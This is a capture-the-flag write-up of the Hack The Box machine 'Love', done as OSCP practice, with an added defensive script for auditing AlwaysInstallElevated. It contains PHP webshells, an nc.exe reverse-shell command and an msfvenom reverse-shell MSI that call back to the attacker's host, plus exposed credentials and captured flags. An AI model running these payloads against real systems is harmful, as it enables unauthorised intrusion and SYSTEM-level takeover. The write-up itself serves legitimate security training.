In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Enumeration
Nmap scan
# Nmap 7.94 scan initiated Mon Nov 6 05:58:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/results/10.10.10.239/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/results/10.10.10.239/scans/xml/_quick_tcp_nmap.xml 10.10.10.239
Nmap scan report for 10.10.10.239
Host is up, received user-set (0.30s latency).
Scanned at 2023-11-06 05:58:42 EST for 94s
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Voting System using PHP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in/organizationalUnitName=love.htb/[email protected]/localityName=norway
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in/organizationalUnitName=love.htb/[email protected]/localityName=norway
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0:1add:5048:afc8:b3cf:7140:6e68:5ff6
| SHA-1: 83ed:29c4:70f6:4036:a6f4:2d4d:4cf6:18a2:e9e4:96c2
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
| mysql-info:
|_ MySQL Error: Host '10.10.14.8' is not allowed to connect to this MariaDB server
| fingerprint-strings:
| NULL, couchbase-data, dominoconsole, drda, gkrellm, informix, kumo-server, metasploit-msgrpc, metasploit-xmlrpc, minecraft-ping, mongodb, oracle-tns, riak-pbc, teamspeak-tcpquery-ver, tor-versions:
|_ Host '10.10.14.8' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46453/tcp): CLEAN (Couldn't connect)
| Check 2 (port 29697/tcp): CLEAN (Couldn't connect)
| Check 3 (port 21885/udp): CLEAN (Failed to receive data)
| Check 4 (port 56070/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 21m32s, deviation: 0s, median: 21m32s
| smb2-time:
| date: 2023-11-06T11:21:36
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 6 06:00:16 2023 -- 1 IP address (1 host up) scanned in 101.45 seconds
The certificate reveals a subdomain, staging.love.htb, which we add to /etc/hosts.
When we enumerate this vhost we find a page where you can submit a file to be scanned.
After looking around, we point the scanner at localhost on port 5000 (the port that returned 403 Forbidden from the outside in the scan above).
We see a username and password exposed:
Vote Admin Creds admin: @LoveIsInTheAir!!!!
We log in with these credentials.
After logging in, there is a place where we can upload a photo. I will try to upload a shell I created with msfvenom.
After uploading, we can access the file under http://10.10.10.239/images/, which we found earlier with dirb.
We create a simple PHP file to test whoami:
<?php
system('cmd.exe /c whoami');
?>
We run it and get:
love\phoebe
To check the working directory:
<?php
system('cmd.exe /c cd');
?>
Working directory:
C:\xampp\htdocs\omrs\images
We upload nc.exe, then upload the following PHP file (test2.php):
<?php
system('cmd.exe /c C:/xampp/htdocs/omrs/images/nc.exe 10.10.14.16 444 -e cmd.exe');
?>
We get a reverse shell:
╭─kali@kali ~/HTB/love
╰─$ nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.239] 49691
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>
User flag
C:\Users\Phoebe\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Phoebe\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
11/07/2023 05:01 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4,165,361,664 bytes free
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
c04a691b061dd2dcdefda7ce1cba0a28
C:\Users\Phoebe\Desktop>
Privilege escalation
systeminfo
C:\xampp\htdocs\omrs\images>systeminfo
systeminfo
Host Name: LOVE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: roy
Registered Organization:
Product ID: 00330-80112-18556-AA148
Original Install Date: 4/12/2021, 12:14:12 PM
System Boot Time: 11/7/2023, 5:00:32 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,678 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,335 MB
Virtual Memory: In Use: 1,464 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\LOVE
Hotfix(s): 9 Hotfix(s) Installed.
[01]: KB4601554
[02]: KB4562830
[03]: KB4570334
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB4589212
[08]: KB5000802
[09]: KB5000858
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.239
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Save the systeminfo output to a text file and check it with Windows Exploit Suggester:
╭─kali@kali ~/HTB/love/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 9 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical
[*] https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
[*] https://github.com/theori-io/chakra-2016-11
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption
[*]
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*]
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*]
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*]
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*]
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*]
[*] done
We will try https://www.exploit-db.com/exploits/39719, which is a PowerShell script.
We download and serve this file:
╭─kali@kali ~/HTB/love
╰─$ wget https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1
--2023-11-07 17:03:07-- https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11460 (11K) [text/plain]
Saving to: ‘Invoke-MS16-032.ps1’
Invoke-MS16-032.ps1 100%[===========================================>] 11.19K --.-KB/s in 0.001s
2023-11-07 17:03:08 (12.5 MB/s) - ‘Invoke-MS16-032.ps1’ saved [11460/11460]
╭─kali@kali ~/HTB/love
╰─$ ls
10.10.10.239 39719.ps1 exploit.php shell.php test2.php test.php
10.10.10.95 exploit.exe Invoke-MS16-032.ps1 test1.php test3.php Windows-Exploit-Suggester
╭─kali@kali ~/HTB/love
╰─$ serve 900
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.5.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
Copy it to the machine and run it, but no luck:
PS C:\temp> .\Invoke-MS16-032.ps1
.\Invoke-MS16-032.ps1
PS C:\temp> whoami
whoami
love\phoebe
PS C:\temp>
Trying winPEAS: serving, uploading and running it.
curl http://10.10.14.16:900/winPEASx64.exe -o winPEASx64.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2332k 100 2332k 0 0 777k 0 0:00:03 0:00:03 --:--:-- 632k
C:\temp>
But before reading the winPEAS output I'll try looking at MS16-032 again, after reading a PoC here: https://pentestlab.blog/tag/ms16-032/
Tried this, but it failed:
PS C:\temp> import-Module ./39719.ps1
import-Module ./39719.ps1
PS C:\temp> Invoke-MS16-032
Invoke-MS16-032
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[!] No valid thread handle was captured, exiting!
PS C:\temp>
Researched a modified one here. I'll try it and, if it doesn't work, I'll get out of the rabbit hole and try winPEAS: https://gist.github.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980
Trying MS16-098
╭─kali@kali ~/HTB/love
╰─$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
--2023-11-07 18:27:19-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-11-07 18:27:20 ERROR 404: Not Found.
╭─kali@kali ~/HTB/love
╰─$ cp ~/Downloads/bfill.exe ~/HTB/love
╭─kali@kali ~/HTB/love
╰─$
On the Windows machine it doesn't work:
C:\temp>bfill.exe
bfill.exe
whoami
[+] Trigerring Exploit.
Done filling.
[!] FillPath() Failed: 58a
GetBitmapBits failed. 6
GetBitmapBits failed. 6
GetBitmapBits failed. 6
GetBitmapBits failed. 6
C:\temp>bfill.exe
bfill.exe
Back to winPEAS, but I will run the checks sequentially so that I am not overwhelmed. The flags are:
winpeas.exe -h # Get Help
winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs)
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
winpeas.exe notcolor #Do not color the output
winpeas.exe domain #enumerate also domain information
winpeas.exe wait #wait for user input between tests
winpeas.exe debug #display additional debug information
winpeas.exe log #log output to out.txt instead of standard output
winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh)
winpeas.exe -lolbas #Execute also additional LOLBAS search check
Starting with the systeminfo check, and from reading this article: https://juggernaut-sec.com/alwaysinstallelevated/#Manually_Enumerating_AlwaysInstallElevated
AlwaysInstallElevated is a functionality that offers ALL users on a Windows operating system the ability to automatically run any MSI file with elevated privileges.
From winPEAS:
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system isn't inside a domain, so it isn't vulnerable
Checking If Inside Container
If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
Enumerate LSA settings - auth packages included
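The winPEAS finding above is the whole root cause of the privilege escalation on this box, so here is an added audit script (not part of the original writeup or of winPEAS) that an administrator can run to check and remediate it. The policy only takes effect when the value is 1 in BOTH HKLM and HKCU, which is why winPEAS reports each hive separately; the function names and the 24-hour log window are my own choices.

```powershell
# Added example, not from the original writeup: audit the AlwaysInstallElevated
# policy. Windows Installer runs MSIs as SYSTEM for any user only when the value
# is 1 under both the machine (HKLM) and the user (HKCU) policy keys.

function Get-AlwaysInstallElevatedState {
    $paths = [ordered]@{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = [ordered]@{}
    foreach ($hive in $paths.Keys) {
        $value = $null
        if (Test-Path $paths[$hive]) {
            $value = (Get-ItemProperty -Path $paths[$hive] -Name 'AlwaysInstallElevated' `
                      -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        # A missing key or value means the policy is not configured (the safe default).
        $state[$hive] = if ($null -eq $value) { 0 } else { [int]$value }
    }
    [pscustomobject]@{
        HKLM        = $state.HKLM
        HKCU        = $state.HKCU
        Exploitable = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Supports -WhatIf so the change can be previewed before it is applied.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($path in 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
                      'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer') {
        if ((Test-Path $path) -and $PSCmdlet.ShouldProcess($path, 'Set AlwaysInstallElevated=0')) {
            Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
    }
}

# Windows Installer logs every completed install to the Application log under the
# MsiInstaller provider (event 1033 / 11707). An install run by a low-privileged
# interactive user while the policy is on is the trace an abuse like this leaves.
function Get-RecentMsiInstalls {
    param([int]$Hours = 24)   # assumed window; adjust to the investigation
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        StartTime    = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -in 1033, 11707 } |
        Select-Object TimeCreated, Id, UserId, Message
}

$state = Get-AlwaysInstallElevatedState
$state
if ($state.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is set in both hives: any user can install MSIs as SYSTEM.'
    Get-RecentMsiInstalls | Format-Table -AutoSize
    Disable-AlwaysInstallElevated -WhatIf   # drop -WhatIf to apply the fix
}
```

On this box the script would report HKLM=1, HKCU=1, Exploitable=True, and the later exploit.msi run would show up as an MsiInstaller event attributed to the phoebe user.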
Creating a reverse shell MSI with msfvenom and serving it:
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 -a x64 --platform windows LPORT=4444 -f msi > exploit.msi
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Copy the exploit across:
C:\temp>curl http://10.10.14.16:900/exploit.msi -o exploit.msi
curl http://10.10.14.16:900/exploit.msi -o exploit.msi
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 156k 0 0:00:01 0:00:01 --:--:-- 100k
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\temp
11/07/2023 05:15 PM <DIR> .
11/07/2023 05:15 PM <DIR> ..
09/15/2015 07:08 AM <DIR> 38202
11/07/2023 07:03 AM 100,613 38202.zip
11/07/2023 03:53 PM 11,829 39719.ps1
11/07/2023 04:52 PM 560,128 bfill.exe
11/07/2023 05:15 PM 159,744 exploit.msi
11/07/2023 03:27 PM 11,460 Invoke-MS16-032.ps1
11/07/2023 03:58 PM 13,929 Modified-MS16-032.ps1
11/07/2023 03:39 PM 2,387,968 winPEASx64.exe
7 File(s) 3,245,671 bytes
3 Dir(s) 4,104,433,664 bytes free
C:\temp>
Set up a listener on port 4444 and run the MSI:
C:\temp>exploit.msi
exploit.msi
C:\temp>
╭─kali@kali ~/HTB/love
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.239] 49727
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
C:\WINDOWS\system32>cd ../../
cd ../../
C:\>cd users
cd users
C:\Users>cd desktop
cd desktop
The system cannot find the path specified.
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
c6273054980087bc56d61b062d24555e
C:\Users\Administrator\Desktop>